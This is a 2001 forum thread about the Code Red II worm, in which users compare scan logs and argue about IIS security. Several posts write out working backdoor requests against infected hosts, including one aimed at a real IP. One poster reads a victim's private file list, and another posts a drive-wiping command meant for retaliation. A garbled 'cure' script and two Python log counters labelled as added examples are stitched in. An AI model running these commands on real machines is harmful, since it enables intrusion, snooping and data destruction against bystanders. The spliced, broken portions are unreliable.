I sent this in as an anonymous story, but it looks like this one got posted instead. According to www.incidents.org there is a new variant of Code Red (of which this would be the third version). This one installs a backdoor. As someone else posted here, the tell-tale sign is that the buffer overwrite payload is now a string of 'X's and not 'N's as in the previous two versions of Code Red. The stakes have been raised, folks.
Because of what some cracker might have done since it was exploited, the only safe thing to do is to reformat c:\... and install a more secure operating system.
Female Prison Rape in NY
If it stopped spreading on the 21st and didn't start again until the 3rd, how could the worm have still been around to spread? That means someone must have had longer than a 10 day uptime on a Win2k box... I don't buy it.
I checked out a couple of boxes in the 24.x.x.x range that had bounced port 80 requests off of my firewall. They were running Win2K/IIS and had their index.htm replaced with a black page whose source contained derogatory comments concerning the "USA Government" and "PoizonBOx". Is this a function of the worm or were they 0wned post-infection?
Never underestimate the power of human stupidity.
Listen to this idea that just hit me: people have been speculating about writing a worm, "Code Green" or whatever to go through and patch the vulnerable IIS servers. What if Microsoft writes this worm, releases it, and comes out as saviors? They'd look better than ever because.
Food for thought, no?
Reality is indistinguishable from any sufficiently advanced fantasy.
Neat, huh?
Fucking Winders NT. I was going to summarily execute the machine it was running on (you guessed it - it crashed), drag it out into the car park and break into and hotwire my old best friend's dilapidated dumped de-registered car and start taking potshots, screaming howling berating and throwing Jack Daniels bottles at it whilst I reversed backward and forward over it, but then I calmed significantly and remembered that all is goo in the land of Microsloth.
Either you didn't read the message at all, or you are an extremely dumb person.
What he's suggesting is to set up Apache so that it will automatically repair any IIS servers that attack it.
Has nothing to do with whether Apache is vulnerable to anything.
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
The guy purports to have "in depth knowledge" of FrontPage 2000. First time I've heard of that as an asset...
Photos.
Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.
I'm also guessing that right now a bunch of /.'ers are doing one of two things:
1) Writing scripts to make things suck more for those who have been compromised (shame on you)
or
2) Writing scripts to fix the compromised servers
I propose that if a script is created to fix these servers (Code Green? :)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmins and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and an even more malicious virus (which, say, deletes the entire contents of the drives or something) will be unleashed soon enough.
So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.
Thanks.
--
I find it really [lame|!1337|st00pid|boring] how a joke will appear and everyone will copy it. Imagine if I had a [Beowulf cluster|DDoS network|Wireless network] full of bots posting stupid clones of jokes we already saw and laughed [never|once|more than we should have] at. [All your base belong to us|FUCK THINK GEEK|Once again, mod me down]. [Mod me down|be careful what you wish for, you will be modded down|shut up you schizoid freak]. Anyway, I'm drunk, as in [Free beer|Stupid assholes, where do you get free beer?|Stupid assholes, why are you trying to compare free speech with beer? I wonder why you get so little public support|Hey, did you see Dune the mini series? It ROCKED!] [Sorry, do punctuation marks go AFTER or BEFORE the bracket?]?
[Anyway|Moving On|Madlibs are for 7 year olds at birthday parties high on sugar and plastic toy fumes], I hope we have come to an understanding that [transparent cases|shock the penguin - FUCK COMPAQ|old men with extremely wide assholes pictured on Christmas Island websites] are no longer [novel|interesting|clever.].
There is a fine line between being a cultivated citizen and being someone else's crop. - A. J. Patrick Liszkie
GET /scripts/root.exe?/c%20dir%20/s%20\* HTTP/1.0 :)
at&t cable, down several hours yesterday (first time in over a month)
I'm not a JavaScript person, but how about writing a bookmarklet to take the current page's URL and query Netcraft for use of IIS and warn the user if it is? Bookmarklets are bookmarks that run small JavaScript programs - more info at http://www.bookmarklets.com/
It should accept post values of just the right type and then use a browser to control the box. So far 29 out of the 94 sites that have tried to attack my cable modem are still active.
echo -e "GET /scripts/root.exe HTTP/1.0\n" | nc -w 1 203.45.218.169 80
You will get:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
...
c:\inetpub\scripts>
if it is hacked.
I was wondering when this mutant roach would be released. How much longer till more "mimin" type ugly bugs are sent out? -quackPOT
The interesting thing was that the "cable" light on my cable modem was still on when usually when I can't get on the net it is off.
So I wonder what the problem really was. If maybe the routers were all up but the dhcp servers were down or something....
Anyone else have similar problems?
--
Garett
Even for Windows users, a $120.00 Linksys box and some know-how will protect you. At least close the blatant problems and protect your internal network.
People need to realise it is like putting locks on the doors to your house. Unless you're safe and secure you're allowing *ANYONE IN!*
Cry me a river.
I see a couple people saying they are getting a lot more of these hits than the original Code Red. Considering that someone earlier posted that it attacks the largest percentage of the time in its own netblock, I'm happy to have my server living in an exclusively Linux netblock. I've only seen one of this new variant so far (from 61.211.105.21 if anyone's interested.) According to my snort logs it's come across my /24 network only 18 times. It pays to have nice neighbors.
Dozings.com -- Its kinda funny... If you're as crazy as me.
Why are unix hosts getting hit so hard with this?
I think this is a fair question. I know many people who run Unix machines and are reportedly getting hit quite frequently with this worm. I run a Win2k Adv server and the firewall I'm using only shows 1 rogue hit from the second attempt at the worm, 'CodeRedII'. I was never hit with the first one. Even if I would have been, my system was already updated.
I'm just curious. Is this worm spreading more quickly on certain IP segments, i.e. @Home? Or could it be that I'm not hearing anything from the Windows users because they have their system unplugged in fear?
On a side note, I've been nailed about a zillion times with the W32/SirCam Outlook Worm. "Hey, where's the reporting on this one?" I'm sending out automatic responses to those people who are sending it to me, as I somehow seem to be in their address book without having a clue who they are.
Every system shows an occasional defect. With MS it's an epidemic. Every week it's a new exploit.
War is necrophilia.
Create a symlink from default.ida in your web root dir to /dev/zero or maybe /dev/urandom. Or better yet, make default.ida a redirect to localhost or fbi.gov.
Does this Code Red Worm affect MacOS X? I haven't been targeted..yet, but I was wondering if the worm can affect a PPC based system.
I have observed a surge in attacks from the CodeRed worm. When it started I was getting about 20 hits a day from the thing. Today I have already gotten a boatload {78} of hits from it.
I have observed a different fill character in the buffer overflow. It used to be X's and now I see N's. I am getting both varieties now.
I have attempted to call the system administrators of the domains which are launching attacks. I have suggested that they alert the users whose machines are infested and take them offline.
I have observed an increase in attacks in my IP block. I have my own domain space in Pacbell's network. I have an increase in attacks from Pacbell San Francisco and Pacbell Los Angeles. I have seen addresses from Taiwan and Quebec {I'm in San Francisco}. I'm running Apache and checking my log hourly.
I can't wait till this thing is dead. Get people aware of what is going on, shut down the MS servers which haven't been patched.
Link to softwaremagic.net
Michael A. Uman
Sr Software Engineer
softwaremagic.net
Hey don't worry about it man, I've got a couple of machines trawling through the address space doing deltrees on these motherfuckers. Screw NT and 2k, install Linux!
And just how does that make you any different than the assholes who released this crap? You are damaging other people's property. Trying to disinfect might be considered acceptable self-defense. Destroying someone's filesystem after a virus left their system open is just opportunistic bullying like the scum who tried to rob the guy in San Jose after he got hit by a bus.
Jackal.
"fuck USA government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn"
Now, this IP range is for Verizon (former GTE) DSL near Seattle, WA, so nobody here would have a yahoo.com.cn address. As far as that PoizonBOx goes, I assume that is the name of the machine or something, but since I don't have any other samples to compare it to (the other IP didn't load), I can't be sure.
--
Monkey sense
But, wait a minute. I assumed that the root.exe prog in the scripts dir is what is allowing all this to happen. And I assumed root.exe was there to begin with, just now it's open season on the little scripting app. Or is root.exe added by CR2? Because if you changed the name, (is there in NT or 2k a way to change executable attributes?) It would render it useless to more attacks. Either way, that Apache admin fight back attitude is good. Could you imagine the news reporting that Apache admins were able to spearhead the CR2 Attack?
Seriously. I'll give him shit if you want. =)
Whoever is programming these viruses needs to get a real life, a real job and a real woman. Stop wasting time with this.
Yes, because MS does not have enough programmers or enough money or enough computers to actually do this themselves. We should all roll up our sleeves and provide free labor for MS. Of course we should also ignore them when they call us communists, un-American and a "cancer". After all, they need our help in fixing their broken systems.
War is necrophilia.
Dude, it was a joke, and thus modded as Funny, Read HAHA.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
echo GET
sleep 1
echo GET
sleep 1
echo GET
md | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore.
--
Thanks man [woman]! That response was even better than my original comment.
... and you even caught my numerous spppeeelling errrs. Mnnnn typping onnnnna callular phune rly mks splng sk. Al ths abrs mk rdng hrd.
An tnx 4 the cmt.
Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!
Or, for even more fun:
GET /scripts/root.exe?/c+dir+\ HTTP/1.0
The rest is left as an exercise to the reader.
Cisco page
...not to give ideas to future worm writers, but one could add the capability to target known IIS sites to the worm. You can extract tons of them off-line from Netcraft, all you have to do is put the list up on servers somewhere. The worm could (with a small probability) go to a "list server" and select targets from it.
If the "victim list servers" could be sufficiently distributed (hopefully over countries/continents), you could have sufficient resiliency to bring down most of the high-profile IIS servers pretty soon. Micros~1 would have a difficult time covering that up.
I'm on an @home network and I've been getting hit pretty hard almost since the first XXX query at about 6 this morning. Since then it's just kept building....I probably get about 60+ an hour right now, and I'd say about 99% of those are from within @home. And things have slowed down a LOT.
Just for perspective....the first time around I got hit maybe 10-15 times TOTAL by Code Red. The second time around, I've been getting 20-30 hits per day of the NNN variety, so this is quite a HUGE increase.
"fist in the air in the land of hypocrisy"
Yeah, and then they yell at your for messing up their computer when you try to clean the damn thing up a little.
I've been checking out some of the IP addresses that have been trying to send me CR2 and I've found that there seem to be two different defacements. The first is directed at the US government and the second is directed at the Chinese government.
Is it possible there are two versions of CR2?
If you go to microsoft.com you will not see anything about CodeRed. However, a quick search will find you this, which is the patch.
One nice thing about the worm is that it is only active in memory, meaning that if you reboot your machine it will die.
The unfortunate part is that I don't see it helping much. I think the problem is that there are thousands of neglected NT/2K boxes with net connections, collecting dust, and getting eaten by worms. Soon this will be called the infected net, the part of the internet that has withered into sludge and pounds away at the rest of the net.
After a while the media will infect the people, and soon follow the lawmakers. Once that happens the government will mandate that computers on the public net must be licensed and maintained regularly. If your computer is infected by a worm, virus, trojan etc.. you will be issued a fine. The internet will be taxed to support the "federal internet safety commission", a group of FCC rejects that constantly monitor and scan your box to make sure you're up to code.
-Jon
this is my sig.
root@gate:~# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 14:43:22 GMT
Content-Length: 215
Content-Type: text/html
Error in CGI Application
CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Connection closed by foreign host.
Block WAN Request: This feature is designed to prevent users from attacking through the internet. When it is enabled, the router will drop both unaccepted TCP requests and ICMP packets from the WAN side. The hacker will not find the router by pinging the WAN IP address.
I have one of these. They are great for running server boxes on a cable modem. Your ISP can't port scan you and actually see anything running. Wonderful.
echo -e GET /scripts/root.exe?%20/c%20rmdir%20/s%20/q%20c:\\ HTTP/1.0\\n | nc *IP TO FUCK* 80
I'm going to run this against any fuckers who hit my web server with this. It's time to fight back.
Being located in Australia on a dial-up subnet, I haven't been subject to the same deluge of connection attempts as the ADSL and DSL subscribers in the USA, and my hits are coming from other sources. In the 150+ hits I have had today that I can identify from the Code Red II worm, the majority have been from Taiwan, a couple from India and mainland China. Currently it seems to have moved onto Korea, as that's where the recent ones have been sourced. 100% of the ones I have Netcrafted (I _like_ that site) have been winblows 2000 running IIS 5. I have had one hit from a German site but I think that was a genuine attempt to find a hole. I am still in the process of collecting IPs at the rate of about one every five to ten minutes, which indicates a possibility of a _lot_ of infected machines out there.
I wonder why MSNBC isn't doing a major story on this.. Gee, I can't figure it out.. I'm just waiting for the headline stories about Microsoft's heads up coding preventing any worm like this from happening again 3 days before the next one strikes..
Who sold you the hardware? If it's Qwest (which I think it was, since you HAVE to go through them for at least the DSL connection (not the ISP though) if you are in their area) then they should be required to. If they don't then that is just horrible business practice IMO. Either way they are my ISP until I switch to another one VERY soon, and they had better have what I need. Once I get it I'll set it up for download if I can and then post it. I personally think Cisco's requirement for registration is idiotic but hey, since we're just the end users I guess it's ok to piss all over us and tell us it's for our own good (please note HEAVY use of sarcasm).
waaaa waaaaa if no one asked why, then we wouldn't be here
Only I can't figure out how to actually use the backdoor.
You get "c:\inetpub\scripts>" but just typing commands does nothing.
Perhaps it's only the illusion of a backdoor; maybe root.exe is just a text file containing "c:\inetpub\scripts>".. though there is always a delay before it pops up.
I guess I can stop messing with people's poor computers and let somebody else figure it out.
Only in BC, I think.... Isn't this the BC Day long weekend?
All I know is that I have a bunch of days off in a row.
If a tree falls on an anonymous coward yelling 'first post' in the forest, does anybody hear?
Actually, the SSA (Social Security) has been hit with it. They run NT4. They only have SP3. I don't think I'm going to stay in a corporate country much longer. I'm moving to Japan.
I have port 80 on my Cisco 675 router turned off.
In fact, it was the first thing I did when I configured the router. But somehow this Code Red worm is still hanging the router occasionally, so that I have to power cycle it. Anyone know why this is happening?
--- even the safest course is fraught with peril
I bet they launched it on Saturday morning on purpose (or Friday night even.) By the time Sunday is over, the hacker(s) will have root access to a shitload of computers, and the sysadmins who hesitated patching showing up Monday morning will have long been 0wned.
Like someone said elsewhere, the best (and only I think) way to partially fix this problem is to write a variant of the worm (Code Green? :)) that fixes all the servers before it gets out of hand. Apache server or not, if 100,000 computers are infected, the traffic costs of Code Red 1, 2, etc. hits alone will be enough of an incentive to fix the IIS servers. (Though it is kind of exciting to think of Microsoft having egg on their faces Monday morning when they get DoSed by 100,000 cable modems in one deafening yell.. but I digress)
--
Two weeks ago I had a redhat 6.2 machine compromised (by an rcp exploit) within 6 hours of installing it. ANY machine not running the very latest security patches should not be connected to a live network.
Of course, the proliferation of Win2k & IIS and worms that infect them means that you'll probably get your system probed sooner running them, but this is going to be true of any popular OS.
I've been posting on the net since 1994 and I still haven't come up with a good sig!
What about Adobe? :)
"It's not a war on drugs, it's a war on personal freedom. Keep that in mind at all times." Bill Hicks
I have analyzed this new worm.
zipped IDA project file and plaintext file can be found at
http://www.eikon.tum.de/~simons/ida_root/.
cheerz
corecode
So here we basically have thousands of boxes with open backdoors, _broadcasting_ their presence to the world.
And with people so nicely distributing their logs here in this forum, the collection of ips is easier than ever!
Now that they have the backdoors, though, how hard would it be to patch them remotely? I'm thinking that if you put up a single exe on any old webserver, you could tell each infected host to just download and execute it. The only problems are writing the exe (not too hard), and figuring out how to get the host to download it, using the backdoor (probably trivial).
Well, it sure did happen to us. As we finished installing Windows 2000, we immediately got DoS attacks that ate up our E1 bandwidth.
However, when tracing the IP addresses, the attacks had been spoofed with private and unallocated IP blocks.
Is this part of the Code Red worm?
johnlaw
Live your life each day as if it was your last.
Most services can be jailed.
BTW Linux has permission systems if you choose to implement them. Unlike the windows world we get choices.
War is necrophilia.
There are filesystems which support ACLs you ought to look into them. As you stated there are also capability systems you can implement.
Whether to chroot services or not is a decision made by the sysadmin.
War is necrophilia.
The owners of routers should be blocking the IP addresses of any unpatched IIS servers. It is their responsibility to make sure their equipment does not compromise the Internet.
My range, I don't seem to find anything coming from 127.x.x.x and I installed CodeRedII myself.
148 so far today against an org in 64. space
Yes, they shut down their pop3 server to keep it from spreading.....
:(
:-)
(i'm sure you're just crushed)
So, what do you think? Was this an intelligent move or just silliness?
either way, it sucks for me that I can't access the mail server
oh well, what can I say but: c'est câble
Having a RoadRunner account, I am getting hit a lot. A parse of my logs is located here on a separate account I have.
My numbers are off a bit since I had my web server down for about 11 days from July 20th to July 31st.
I have received 129 CR1 scans and 267 CR2 scans so far. I have noticed that the scan rate for CR2 seems to be higher but I might just be imagining things, or it might be inaccurate due to incomplete data.
cF (Hiding behind my Linux firewall)
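Several posts above count CR1 versus CR2 scans by hand and note that the two are told apart by the fill character ('N' in the first two versions, 'X' in the third), and that CR2 mostly hits its own netblock. The script below is an added example (not from any poster) that does that tally over Apache common-log lines: it classifies each default.ida request by fill character, counts hits and unique hosts per variant, and buckets sources by whether they share the server's /8 or /16. The log lines, addresses and the local server address are constructed for the example; only the default.ida path and the N/X fill come from the thread.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Apache common log format: ip ident user [timestamp] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# Worm requests hit /default.ida with a long run of one fill character before the
# %u-encoded payload. The threshold of 16 is a conservative assumption; real
# requests carry a far longer run, so this still matches them.
WORM_RE = re.compile(r'^/default\.ida\?(?P<fill>[NX])(?P=fill){15,}')


def classify(path):
    """Return the variant name for a worm request path, or None if not a worm hit."""
    m = WORM_RE.match(path)
    if not m:
        return None
    # 'X' fill = Code Red II (third version); 'N' fill = the earlier two versions.
    return "CodeRedII" if m.group("fill") == "X" else "CodeRed"


def analyze(log_text, local_ip):
    """Tally worm hits per variant, per (variant, source), and by netblock locality.

    Returns (hits_per_variant, hits_per_source, locality) where locality counts how
    many worm hits came from the server's own /16, its /8 but not /16, or elsewhere.
    """
    local = ip_address(local_ip)
    same_8 = ip_network(f"{local}/8", strict=False)
    same_16 = ip_network(f"{local}/16", strict=False)
    hits = Counter()
    sources = Counter()
    locality = {"same_/16": 0, "same_/8_only": 0, "elsewhere": 0}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in CLF shape
        variant = classify(m.group("path"))
        if variant is None:
            continue                      # ordinary request, not a worm scan
        src = ip_address(m.group("ip"))
        hits[variant] += 1
        sources[(variant, str(src))] += 1
        if src in same_16:
            locality["same_/16"] += 1
        elif src in same_8:
            locality["same_/8_only"] += 1
        else:
            locality["elsewhere"] += 1
    return hits, sources, locality


def unique_hosts(sources):
    """Collapse per-source counts into the number of distinct scanning hosts per variant."""
    hosts = Counter()
    for (variant, _ip) in sources:
        hosts[variant] += 1
    return hosts


# Constructed sample log (documentation/test address ranges only, not real captures).
# The %u tail is truncated; the fill run is what the classifier keys on.
CR2_PATH = "/default.ida?" + "X" * 24 + "%u9090%u6858"
CR1_PATH = "/default.ida?" + "N" * 24 + "%u9090%u6858"


def _line(ip, ts, path, status="404"):
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.0" {status} 287'


SAMPLE_LOG = "\n".join([
    _line("192.0.2.77", "04/Aug/2001:19:50:18 -0400", CR2_PATH),     # same /16
    _line("192.0.5.3", "04/Aug/2001:19:51:30 -0400", CR2_PATH),      # same /16
    _line("192.168.1.20", "04/Aug/2001:19:55:02 -0400", CR2_PATH),   # same /8 only
    _line("198.51.100.9", "04/Aug/2001:19:58:09 -0400", CR1_PATH),   # elsewhere
    _line("203.0.113.44", "04/Aug/2001:19:59:18 -0400", CR1_PATH),   # elsewhere
    _line("192.0.2.77", "04/Aug/2001:20:03:41 -0400", CR2_PATH),     # repeat host
    _line("198.51.100.9", "04/Aug/2001:20:05:00 -0400", "/index.html", "200"),
])

LOCAL_SERVER_IP = "192.0.2.10"   # assumed address of the logging server


if __name__ == "__main__":
    hits, sources, locality = analyze(SAMPLE_LOG, LOCAL_SERVER_IP)
    print("hits per variant:", dict(hits))
    print("unique hosts per variant:", dict(unique_hosts(sources)))
    print("locality of scans:", locality)
```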
For those getting scanned and logging it:
Each time a host scans you, inform the user/operator/whatever of that machine that he/she is infected. How? Use the backdoor. Send a single request to the backdoor that opens up their browser to http://www.digitalisland.net/codered/ or a similar page. Just have the backdoor run "start http://whatever.url.you.choose/".
It's easy, and it can be automated. Even easier would be to just write/run a script that goes through your logs and does that for each host that attempted a scan.
http://infected_system/scripts/root.exe?/c+dir+c:\
try this
http:// {infected ip here }/scripts/root.exe?/c%20dir%20c:\windows\recent
and see what the admin's been doing!
the first time I tried this on someone, I got:
05 16 2001 11:54p 336 Cc1.avi.lnk
05 16 2001 11:54p 342 Blow1.avi.lnk
05 16 2001 11:54p 366 philly_03.mpa.lnk
05 16 2001 11:54p 335 1.zip.lnk
05 17 2001 12:13a 335 3.zip.lnk
07 14 2001 01:58p 347 Maishman Accounting.mdb.lnk
07 14 2001 01:58p 302 Dessi.doc.lnk
07 14 2001 01:58p 293 Dessi.jpg.lnk
looks like everyone loves p0rn!!!
jesus christ, think of how terrible this is.. tens of thousands of machines with ROOT ACCESS to anyone with a web browser.. credit card numbers, passwords, etc... this is INSANE.. thanks microsoft!!!
for the GOOD guys out there, try to put something on the desktop along the lines of "YOU HAVE A VIRUS!", ie echo >c:\windows\desktop\"you have a virus.txt"
Thanks a lot for your suggestion!
:-)
I tried it a couple of times, but all the time I got pages back either explaining 'the server is busy' or some such, and I did make sure to first clean out the spaces you mentioned. I didn't pay much attention to the text, but I then gave up trying, as it isn't actually *really* my problem
I only got around 110 CR2 attempts on my own server since this morning so it doesn't choke it at all or deny me any service that I have.
Most IPs must be temporary [dialup?] connections anyway, because most of them don't connect at all (ping, regular telnet 80) and it is then amazing that those people run vulnerable webservers and get attacked in the [short?] window of time they are connected.
Going to a technical job fair this weekend. Luckily I know a bit (not everything there is to know yet, if knowing everything is ever possible) about running Apache.
:-).
Maybe we'll see a rise in demand for experienced *nix and GNU/Linux users...
We'll see
StarTux
We are getting insane amounts of calls about this exact problem, and most of them from users that submit firewall logs documenting the attack. It's hosing the service; routers are being taken offline left and right.
I plan to live forever, so far so good...
To notify someone that they have this, try the following:
http://{infected ip here}/scripts/root.exe?/c%20echo%20f>c:\windows\desktop\warning%20you%20have%20the%20code%20red%202%20virus%20your%20computer%20attacked%20mine%20please%20get%20a%20virus%20scanner.txt
I'm @home, and I'm denying and logging port 80... I've seen about 400 attempts from different IPs in the 24 addys. go @HOME!
Does the worm close off any subsequent attacks? I cannot see that it does. I have been looking at a few logs and see that both the anti-US hack as well as the SirCam hack can co-exist on the same server.
Is it possible to write a similar script that will a) re-write default.asp to a more friendly hack -- stating that the host is wide open and have re-set perms so that it cannot be hacked again? Basically deadbolt the door behind you?
There could be a new format of warfare out on the net, where the good worms are in a race against the bad. It seems though that it would definitely test the prowess of the best coders out there!!!
How about just call "net stop {IIS service name}"? I forgot what the IIS service name is...
It's not safe to install IIS or any MS OS. Period. Don't plug it in after you've installed; you know that you'll be hit again. Install a real OS--Linux, FreeBSD, OpenBSD, NetBSD--and go to town. They're all general-purpose OSes. They can all do what you need. Deal with their problems; it's better than dealing with Microsoft's.
Capability systems are far more complex than older, permissions-based systems. But don't we owe it to ourselves to use some of our spare CPU cycles and bytes to actually do something? With the right administration tools, capabilities should be doable. And worms like Code Red would be made much more difficult.
My machine was online for about 24 hours yesterday via @home, and I logged 197 http requests, which I suspected were caused by CodeRed. I've been online today for less than 1/2 an hour, and I've got 17. It really is slowing the network down badly.
The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.
- Operating systems are more complex than cars.
- Operating systems don't require a license to be operated.
Irrelevant. There are plenty of products that are more complex than cars, and consumers are still protected if they fail dramatically. Pharmaceuticals, for example. Designing a molecule and testing it is at least as difficult as designing a car.
Do you seriously think that the complexity of the product is an excuse? That's crazy. Far better to ask the companies to simply know their limitations, and not ship products that they can't build to reasonable standards of quality.
The licensing issue is irrelevant too. If my microwave catches fire, I can sue somebody. If my custom-built house collapses, I can sue somebody. If my shotgun explodes, I can sue somebody.
I don't mean to sound sue-crazy -- but the only deterrent we, the public, have, is our ability to use the legal system to whack companies that try to pull a fast one on us. If we lose that ability, we'll have nothing but crap to choose from.
perhaps http://infectedser/scripts/root.exe?/c+md%20c:\no
I can tell you that I work for a VERY large corporation and after this weekend of hell, we may seriously think about removing all IIS from the enterprise.
65.3.142.118 - - [05/Aug/2001:13:54:13 -0700] "GET /default.ida?XXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXXX$
/default.ida?NNNNNNNNNNNNN$
/default.ida?XXXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXX
65.3.198.25 - - [05/Aug/2001:13:54:42 -0700] "GET
65.3.36.203 - - [05/Aug/2001:13:55:33 -0700] "GET
65.3.25.229 - - [05/Aug/2001:14:01:32 -0700] "GET
65.3.198.65 - - [05/Aug/2001:14:03:37 -0700] "GET
65.3.7.109 - - [05/Aug/2001:14:06:23 -0700] "GET
206.218.150.55 - - [05/Aug/2001:14:09:57 -0700] "GET
65.3.84.67 - - [05/Aug/2001:14:10:06 -0700] "GET
65.11.72.158 - - [05/Aug/2001:14:12:45 -0700] "GET
65.3.200.229 - - [05/Aug/2001:14:14:12 -0700] "GET
65.3.214.216 - - [05/Aug/2001:14:14:17 -0700] "GET
65.25.173.24 - - [05/Aug/2001:14:14:20 -0700] "GET
All this crap is coming mostly from the @home Class A.
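As an added example (written for this page, not by any poster in the thread): a small Python script that does the tally the posts above do by hand, counting Code Red probes in an Apache access log by variant and by source /8 and /16, and reporting how many came from the logging server's own /8 and /16. The sample lines and the local address are constructed; the source addresses are the ones posted above, the request tails and status fields are invented.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Apache combined-format request line for a Code Red probe. Code Red I
# padded the query with 'N' and Code Red II with 'X', so the first pad
# byte tells the two variants apart.
CODE_RED_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[[^\]]+\] '
    r'"GET /default\.ida\?(?P<pad>[NX])'
)
# Constructed sample: source addresses as posted above, request tails and
# status fields invented so that the lines are complete.
SAMPLE_LOG = """\
65.3.142.118 - - [05/Aug/2001:13:54:13 -0700] "GET /default.ida?XXXXXXXXXX HTTP/1.0" 404 280
65.3.198.25 - - [05/Aug/2001:13:54:42 -0700] "GET /default.ida?XXXXXXXXXX HTTP/1.0" 404 280
65.11.72.158 - - [05/Aug/2001:14:12:45 -0700] "GET /default.ida?XXXXXXXXXX HTTP/1.0" 404 280
206.218.150.55 - - [05/Aug/2001:14:09:57 -0700] "GET /default.ida?NNNNNNNNNN HTTP/1.0" 404 280
65.3.7.109 - - [05/Aug/2001:14:06:23 -0700] "GET /index.html HTTP/1.0" 200 1043
"""
LOCAL_IP = "65.3.1.1"  # hypothetical address of the server keeping the log

def classify(line):
    """Return (source_ip, variant) for a Code Red probe line, else None."""
    m = CODE_RED_RE.match(line)
    if not m:
        return None
    variant = "CodeRed-I" if m.group("pad") == "N" else "CodeRed-II"
    return m.group("ip"), variant

def summarize(lines, local_ip):
    """Tally probes by variant and by source /8 and /16, and count how many
    came from the server's own /8 and /16: Code Red II's preference for
    nearby address space shows up as a large share from the local /16."""
    local_a = ip_network(f"{local_ip}/8", strict=False)
    local_b = ip_network(f"{local_ip}/16", strict=False)
    stats = {"total": 0, "variants": Counter(), "by_slash8": Counter(),
             "by_slash16": Counter(), "same_slash8": 0, "same_slash16": 0}
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue  # ordinary request, not a probe
        ip_str, variant = hit
        src = ip_address(ip_str)
        stats["total"] += 1
        stats["variants"][variant] += 1
        stats["by_slash8"][str(ip_network(f"{src}/8", strict=False))] += 1
        stats["by_slash16"][str(ip_network(f"{src}/16", strict=False))] += 1
        stats["same_slash8"] += int(src in local_a)
        stats["same_slash16"] += int(src in local_b)
    return stats
```

Run it as `summarize(open("access_log").read().splitlines(), "<your address>")` to get the same breakdown for a real log.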
There's been stacks of Unix worms this year:
* l10n
* adore
* Red Worm
and a whole bunch of variants.
And there will be more in the future as Linux becomes more mainstream. A virus would also be completely possible - sure, default permissions mean a virus acting on behalf of an ordinary user can't do nasty things to `cp', but it can delete that user's last 5 years of work.
Linux still lacks a real permission system, and there are unfortunately still many apps which run with unnecessary root privileges, rather than single-root-component (think Postfix) or 2.4's capabilities (think ProFTPd).
As always, it's being improved, but I've verified this script works on my server:
CodeRed Counter Script
The Logs, note Confirmation Log.
Now I just need to figure out that win32 command line to set the IP address to 10.1.2.3.
My cable modem is getting flooded by ARP requests from the @Home routers.
I want to delete my account but Slashdot doesn't allow it.
Oh hell, I blew that file away a long time ago. When I set up IIS I wasn't about to get screwed over by a bunch of default settings. I wiped out all the presets and defaults and started from scratch. Directory structure, user permissions, file permissions, the whole works.
